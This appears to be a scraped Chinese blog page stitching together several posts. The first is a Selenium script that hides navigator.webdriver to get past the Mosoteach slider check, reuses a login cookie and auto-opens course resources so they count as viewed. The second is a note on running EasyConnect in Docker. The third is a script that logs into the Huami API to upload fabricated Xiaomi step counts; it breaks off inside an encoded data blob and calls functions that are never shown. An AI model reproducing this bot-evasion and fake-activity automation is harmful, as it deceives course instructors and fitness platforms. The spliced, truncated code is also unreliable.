                        # self.browser.find_element(By.XPATH, '//div[@class="viewer-canvas"]/img').send_keys(Keys.ESCAPE)
                        # &#128070;，想通过 Esc 键关闭图片，但是一直报错，怀疑没有找对施加 Esc 键的元素
                        self.browser.find_element(By.XPATH, '//div[@class="viewer-button viewer-close"]').click()
                    # 在新标签页中打开，最后一起关闭。但是当标签页太多，可能会出现问题
                    else:  # 文件或者网页，在新标签页打开
                        print('正在打开资源：', filename)
                        ActionChains(self.browser).key_down(Keys.CONTROL).perform()
                        res.click()
                        ActionChains(self.browser).key_up(Keys.CONTROL).perform()
 
 
Browser = Browser()
#Browser.get_cookie()
Browser.login()
Browser.browse()

from time import sleep
 
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
 
class Browser:
    def __init__(self):
        options = Options()
        options.page_load_strategy = 'eager'
        self.browser = webdriver.Chrome(options=options)
        self.browser.maximize_window()
        # 修改 window.navigator.webdriver 的值，不然滑块验证过不去
        self.browser.execute_cdp_cmd('Page.addScriptToEvaluateOnNewDocument', {
            'source':'''
            Object.defineProperty(navigator, 'webdriver', {
                get: () => undefined
                })'''
        })
 
    def get_cookies(self):
        self.browser.get('https://www.mosoteach.cn/web/index.php?c=passport&m=index')
        self.browser.find_element(By.ID, 'phone-login-button').click()  # 切换到短信验证码登录
        self.browser.find_element(By.ID, 'phone-login-remember-me').click() # 勾选 30 天自动登录
        self.browser.find_element(By.ID, 'phone-number').send_keys('')    # 输入手机号
 
        slider = self.browser.find_element(By.XPATH, '//div[@class="slider-box"]//span[@class="nc_iconfont btn_slide"]')
        size = self.browser.find_element(By.XPATH, '//div[@class="slider-box"]//div[@class="scale_text slidetounlock"]').size
        ActionChains(self.browser).drag_and_drop_by_offset(slider, size['width'], -size['height']).perform()    # 滑动滑块
        button = self.browser.find_element(By.ID, 'get-verify-code')
        WebDriverWait(self.browser, 3).until(EC.element_to_be_clickable(button))    # 判断节点是否可以点击
        button.click()
        input = self.browser.find_element(By.XPATH, '//div[@class="verify-box"]/input')
        input.click()   # 将光标定位到输入框
        # 判断验证码是否输入完毕
        while True:
            verify_code = input.get_attribute('value')
            if len(verify_code) == 4:
                break
        self.browser.find_element(By.ID, 'login-button-2').click()
        WebDriverWait(self.browser, 30).until(EC.title_is('云班课 - 我的班课'))
        cookies = self.browser.get_cookie('login_token')
        with open('d:/cookies.txt', 'w', encoding='utf-8') as f:
            f.write(str(cookies))
 
    # 勾选 30 天自动登录后，才有 login_token 这个 cookie
    def login(self):
        self.browser.get('https://www.mosoteach.cn/web/index.php?c=passport&m=index')
        self.browser.delete_all_cookies()
        self.browser.add_cookie(cookie)    # 输入你的 cookie
        self.browser.get('https://www.mosoteach.cn/web/index.php?c=passport&m=index')
 
    def browse(self):
        self.browser.get('  ')   # 课程网址
        hide_div = self.browser.find_elements(By.CLASS_NAME, 'hide-div')
        for div in hide_div:
            self.browser.execute_script('arguments[0].scrollIntoView();', div)  # 将页面跳转到元素的位置
            remain = div.find_element(By.XPATH, './preceding-sibling::*/span[3]').text
            if remain == '0' or div.get_attribute('data-status')  == 'Y':   # 判断是否有未读文件，有的话再判断分组是否展开
                continue
            div.find_element(By.XPATH, './preceding-sibling::*').click()    # 展开分组
            resource = div.find_elements(By.CLASS_NAME, 'res-info')
            # 资源有：.jpg（Esc 键关闭）、.pdf/.pptx/.doc/.xls/网页链接（新标签页打开）、视频（手动播放）
            for res in resource:
                self.browser.execute_script('arguments[0].scrollIntoView();', res)  # 将页面跳转到元素的位置
                if res.find_element(By.XPATH, './div[2]/span[7]').get_attribute('data-is-drag') == 'N':     # 筛选出未读的资源
                    filename = res.find_element(By.CLASS_NAME, 'res-name').text
                    type = res.find_element(By.XPATH, './parent::*').get_attribute('class').split()[2]  # 判断是否是网页
                    judge = {filename.endswith(i) for i in ['.pdf', '.pptx', '.doc', '.xls']}   # 判断是否是文件
                    if filename.endswith('.jpg'):   # 图片
                        print('正在打开图片：', filename)
                        res.click()
                        sleep(3)
                        # self.browser.find_element(By.XPATH, '//div[@class="viewer-canvas"]/img').send_keys(Keys.ESCAPE)
                        # &#128070;，想通过 Esc 键关闭图片，但是一直报错，怀疑没有找对施加 Esc 键的元素
                        self.browser.find_element(By.XPATH, '//div[@class="viewer-button viewer-close"]').click()
                    # 在新标签页中打开，最后一起关闭。但是当标签页太多，可能会出现问题
                    elif judge == {True, False} or type == 'web':  # 需要新标签页打开的
                        print('正在打开资源：', filename)
                        ActionChains(self.browser).key_down(Keys.CONTROL).perform()
                        res.click()
                        ActionChains(self.browser).key_up(Keys.CONTROL).perform()
 
 
Browser = Browser()
Browser.login()
Browser.browse()

分享一个去掉 easyconnect 毒瘤的好方法

作者: 纯情
时间: 2022-07-01
分类: 网络
评论

我们公司连到内网需要登陆 easyconnect ，这个软件会在后台常驻一个线程，看着很不爽，同时也害怕他在后台上传啥数据，所以我在 github 上找到了一个在 docker 内跑 easyconnect 的库 https://github.com/Hagb/docker-easyconnect

这个库很好用，但是吧，命令行之类的代理起来比较麻烦，今天我测试了一下使用 surge 添加 easyconnect 的代理，果然可以使用增强模式。

但是还有一个问题，把代理暴露在公网肯定是不安全，我想着家里有个闲置的服务器，干脆把 easyconnect 跑在上面得了，刚好我家也有公网 ip ，搭建好 wireguard 作为 easyconnect 的前置代理，surge 也能完美支持 wireguard 协议。

完美的解决了我的问题，再也不用打开恶心的 easyconnect

小米运动步数修改阿里云函数版本

作者: 纯情
时间: 2022-07-01
分类: 网络
评论

自腾讯云服务开始收费后，就把小米步数修改部署到阿里云服务。以下代码均来源于各位大佬的分享，做了一些裁剪，大佬们见谅。

代码简介

是否支持多账号：否
消息推送平台：
Qmsg酱QQ推送
PUSHPLUS推送
server酱微信推送

# -*- coding: utf8 -*-
import requests,time,re,json
from random import randint
  
headers = {
    'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; MI 6 MIUI/20.6.18)'
    }
   
#获取登录code
def get_code(location):
    code_pattern = re.compile("(?<=access=).*?(?=&)")
    code = code_pattern.findall(location)[0]
    #print(code)
    return code
   
#登录
def login(user,password):
    url1 = "https://api-user.huami.com/registrations/+86" + user + "/tokens"
    headers = {
        "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
        "User-Agent":"MiFit/4.6.0 (iPhone; iOS 14.0.1; Scale/2.00)"
        }
    data1 = {
        "client_id":"HuaMi",
        "password":f"{password}",
        "redirect_uri":"https://s3-us-west-2.amazonaws.com/hm-registration/successsignin.html",
        "token":"access"
        }
    r1 = requests.post(url1,data=data1,headers=headers,allow_redirects=False)
    print(r1.text)
    location = r1.headers["Location"]
    #print(location)
    try:
        code = get_code(location)
    except:
        return 0,0
    print("access_code获取成功！")
    print(code)
       
    url2 = "https://account.huami.com/v2/client/login"
    data2 = {
        "app_name":"com.xiaomi.hm.health",
        "app_version":"4.6.0",
        "code":f"{code}",
        "country_code":"CN",
        "device_id":"2C8B4939-0CCD-4E94-8CBA-CB8EA6E613A1",
        "device_model":"phone",
        "grant_type":"access_token",
        "third_name":"huami_phone",
        } 
    r2 = requests.post(url2,data=data2,headers=headers).json()
    login_token = r2["token_info"]["login_token"]
    print("login_token获取成功！")
    print(login_token)
    userid = r2["token_info"]["user_id"]
    print("userid获取成功！")
    print(userid)
   
    return login_token,userid
  
   
#主函数
def main():     
    login_token = 0
    login_token,userid = login(user,password)
    if login_token == 0:
        print("登陆失败！")
        return "login fail!"
   
    t = get_time()
       
    app_token = get_app_token(login_token)
   
    date = time.strftime("%Y-%m-%d",time.localtime())
      
    today = time.strftime("%F")
    data_json = '%5B%7B%22data_hr%22%3A%22%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FVv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0v%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0n%5C%2Fa%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1FK%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9PTFFpaf9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0j%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9K%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzf%5C%2F%5C%2F%5C%2F86%5C%2Fzr%5C%2FOv88%5C%2Fzf%5C%2FPf%5C%2F%5C%2F%5C%2F0v%5C%2FS%5C%2F8%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FSf%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fz3%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0r%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F9L%5C%2Fzb%5C%2FSf9K%5C%2F0v%5C%2FRf9H%5C%2Fzj%5C%2FSf9K%5C%2F0%5C%2F%5C%2FN%5C%2F%5C%2F%5C%2F%5C%2F0D%5C%2FSf83%5C%2Fzr%5C%2FPf9M%5C%2F0v%5C%2FOv9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzv%5C%2F%5C%2Fz7%5C%2FO%5C%2F83%5C%2Fzv%5C%2FN%5C%2F83%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fz%5C%2F%5C%2FNv83%5C%2Fzn%5C%2FXv84%5C%2Fzr%5C%2FPP84%5C%2Fzj%5C%2FN%5C%2F9e%5C%2Fzr%5C%2FN%5C%2F89%5C%2F03%5C%2FP%5C%2F89%5C%2Fz3%5C%2FQ%5C%2F9N%5C%2F0v%5C%2FTv9C%5C%2F0H%5C%2FOf9D%5C%2Fzz%5C%2FOf88%5C%2Fz%5C%2F%5C%2FPP9A%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fzz%5C%2FNv87%5C%2F0D%5C%2FOv84%5C%2F0v%5C%2FO%5C%2F84%5C%2Fzf%5C%2FMP83%5C%2FzH%5C%2FNv83%5C%2Fzf%5C%2FN%5C%2F84%5C%2Fzf%5C%2FOf82%5C%2Fzf%5C%2FOP83%5C%2Fzb%5C%2FMv81%5C%2FzX%5C%2FR%5C%2F9L%5C%2F0v%5C%2FO%5C%2F9I%5C%2F0T%5C%2FS%5C%2F9A%5C%2Fzn%5C%2FPf89%5C%2Fzn%5C%2FNf9K%5C%2F07%5C%2FN%5C%2F83%5C%2Fzn%5C%2FNv83%5C%2Fzv%5C%2FO%5C%2F9A%5C%2F0H%5C%2FOf8%5C%2F%5C%2Fzj%5C%2FPP83%5C%2Fzj%5C%2FS%5C%2F87%5C%2Fzj%5C%2FNv84%5C%2Fzf%5C%2FOf83%5C%2Fzf%5C%2FOf83%5C%2Fzb%5C%2FNv9L%5C%2Fzj%5C%2FNv82%5C%2Fzb%5C%2FN%5C%2F85%5C%2Fzf%5C%2FN%5C%2F9J%5C%2Fzf%5C%2FNv83%5C%2Fzj%5C%2FNv84%5C%2F0r%5C%2FSv83%5C%2Fzf%5C%2FMP%5C%2F%5C%2F%5C%2Fzb%5C%2FMv82%5C%2Fzb%5C%2FOf85%5C%2Fz7%5C%2FNv8%5C%2F%5C%2F0r%5C%2FS%5C%2F85%5C%2F0H%5C%2FQP9B%5C%2F0D%5C%2FNf89%5C%2Fzj%5C%2FOv83%5C%2Fzv%5C%2FNv8%5C%2F%5C%2F0f%5C%2FSv9O%5C%2F0ZeXv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1X%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9B%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FTP%5C%2F%5C%2F%5C%2F1b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9N%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%22%2C%22date%22%3A%222021-08-07%22%2C%22data%22%3A%5B%7B%22start%22%3A0%2C%22stop%22%3A1439%2C%22value%22%3A%22UA8AUBQAUAwAUBoAUAEAYCcAUBkAUB4AUBgAUCAAUAEAUBkAUAwAYAsAYB8AYB0AYBgAYCoAYBgAYB4AUCcAUBsAUB8AUBwAUBIAYBkAYB8AUBoAUBMAUCEAUCIAYBYAUBwAUCAAUBgAUCAAUBcAYBsAYCUAATIPYD0KECQAYDMAYB0AYAsAYCAAYDwAYCIAYB0AYBcAYCQAYB0AYBAAYCMAYAoAYCIAYCEAYCYAYBsAYBUAYAYAYCIAYCMAUB0AUCAAUBYAUCoAUBEAUC8AUB0AUBYAUDMAUDoAUBkAUC0AUBQAUBwAUA0AUBsAUAoAUCEAUBYAUAwAUB4AUAwAUCcAUCYAUCwKYDUAAUUlEC8IYEMAYEgAYDoAYBAAUAMAUBkAWgAAWgAAWgAAWgAAWgAAUAgAWgAAUBAAUAQAUA4AUA8AUAkAUAIAUAYAUAcAUAIAWgAAUAQAUAkAUAEAUBkAUCUAWgAAUAYAUBEAWgAAUBYAWgAAUAYAWgAAWgAAWgAAWgAAUBcAUAcAWgAAUBUAUAoAUAIAWgAAUAQAUAYAUCgAWgAAUAgAWgAAWgAAUAwAWwAAXCMAUBQAWwAAUAIAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWREAWQIAUAMAWSEAUDoAUDIAUB8AUCEAUC4AXB4AUA4AWgAAUBIAUA8AUBAAUCUAUCIAUAMAUAEAUAsAUAMAUCwAUBYAWgAAWgAAWgAAWgAAWgAAWgAAUAYAWgAAWgAAWgAAUAYAWwAAWgAAUAYAXAQAUAMAUBsAUBcAUCAAWwAAWgAAWgAAWgAAWgAAUBgAUB4AWgAAUAcAUAwAWQIAWQkAUAEAUAIAWgAAUAoAWgAAUAYAUB0AWgAAWgAAUAkAWgAAWSwAUBIAWgAAUC4AWSYAWgAAUAYAUAoAUAkAUAIAUAcAWgAAUAEAUBEAUBgAUBcAWRYAUA0AWSgAUB4AUDQAUBoAXA4AUA8AUBwAUA8AUA4AUA4AWgAAUAIAUCMAWgAAUCwAUBgAUAYAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAWwAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAeSEAeQ8AcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBcAcAAAcAAAcCYOcBUAUAAAUAAAUAAAUAAAUAUAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCgAeQAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcBgAeQAAcAAAcAAAegAAegAAcAAAcAcAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCkAeQAAcAcAcAAAcAAAcAwAcAAAcAAAcAIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCIAeQAAcAAAcAAAcAAAcAAAcAAAeRwAeQAAWgAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcBoAeScAeQAAegAAcBkAeQAAUAAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAegAAegAAcAAAcAAAcBgAeQAAcAAAcAAAcAAAcAAAcAAAcAkAegAAegAAcAcAcAAAcAcAcAAAcAAAcAAAcAAAcA8AeQAAcAAAcAAAeRQAcAwAUAAAUAAAUAAAUAAAUAAAUAAAcAAAcBEAcA0AcAAAWQsAUAAAUAAAUAAAUAAAUAAAcAAAcAoAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBYAegAAcAAAcAAAegAAcAcAcAAAcAAAcAAAcAAAcAAAeRkAegAAegAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAEAcAAAcAAAcAAAcAUAcAQAcAAAcBIAeQAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBsAcAAAcAAAcBcAeQAAUAAAUAAAUAAAUAAAUAAAUBQAcBYAUAAAUAAAUAoAWRYAWTQAWQAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAMAcAAAcAQAcAAAcAAAcAAAcDMAeSIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBQAeQwAcAAAcAAAcAAAcAMAcAAAeSoAcA8AcDMAcAYAeQoAcAwAcFQAcEMAeVIAaTYAbBcNYAsAYBIAYAIAYAIAYBUAYCwAYBMAYDYAYCkAYDcAUCoAUCcAUAUAUBAAWgAAYBoAYBcAYCgAUAMAUAYAUBYAUA4AUBgAUAgAUAgAUAsAUAsAUA4AUAMAUAYAUAQAUBIAASsSUDAAUDAAUBAAYAYAUBAAUAUAUCAAUBoAUCAAUBAAUAoAYAIAUAQAUAgAUCcAUAsAUCIAUCUAUAoAUA4AUB8AUBkAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAA